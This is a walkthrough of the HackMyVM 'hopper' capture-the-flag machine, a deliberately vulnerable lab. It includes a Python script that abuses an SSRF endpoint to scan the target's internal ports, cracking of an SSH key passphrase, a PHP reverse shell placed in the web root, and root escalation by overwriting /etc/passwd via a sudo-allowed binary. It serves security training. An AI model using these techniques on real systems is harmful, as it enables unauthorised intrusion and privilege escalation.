hackmyvm-hopper walkthrough
2022-08-02 03:59:00 【xdeclearn】
hackmyvm: hopper
Information gathering to get the first shell
```
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
```
After the full port scan, visit the web service first.
Use gobuster to scan for directories. This finds the directory advanced-search, which has an SSRF vulnerability.

The virtual machine has three users who can log in with bash: root, edward and henry.
A quick test shows that remote file inclusion is not possible; the endpoint presumably calls curl_exec. For exploiting SSRF in PHP, see SSRF in PHP[1]. This case is a little unusual, though: there is no redis and no mysql, so the host's ports are probed instead.
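```python
#!/usr/bin/python3
import requests

# Probe every TCP port on the target's loopback interface through the SSRF endpoint.
# range() excludes its upper bound, so 65536 is needed to include port 65535.
for port in range(1, 65536):
    res = requests.get('http://192.168.143.191/advanced-search/path.php?path=http://127.0.0.1:%d' % port)
    # An empty body means nothing answered on that port.
    if len(res.text) == 0:
        continue
    print('-----------------------')
    print('port %d\n' % port)
    print(res.text)
    print('-----------------------')
```
The new port obtained by scanning is 2222.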
Next comes directory discovery: brute-forcing directories reveals a directory named backup.
Its content turns out to be a passphrase-protected SSH key, so use john to crack it; see JTR (John The Ripper)'s ssh key crack record[2]. The passphrase is barcelona.
Use id_rsa to log in over SSH as user edward and get the user flag.
Switch user
Write a PHP reverse-shell script into the /var/www/html directory; this yields a shell as user www-data.
Check this user's sudo privileges.
Following GTFOBins[3], switch to user henry (note that the environment variable needs to be set with export TERM=xterm before running the program).
Elevate to root
View sudo permissions for user henry.
This one is relatively simple: change /etc/passwd.
Copy passwd to the /tmp directory and replace the x in the root user's entry with a known encrypted password.
Then, from /tmp, use the command sudo /usr/bin/ascii-xfr -rv /etc/passwd
Reference
[1] https://blog.csdn.net/bylfsj/article/details/105083164
[2] https://blog.csdn.net/qq_40490088/article/details/97812715
[3] https://gtfobins.github.io/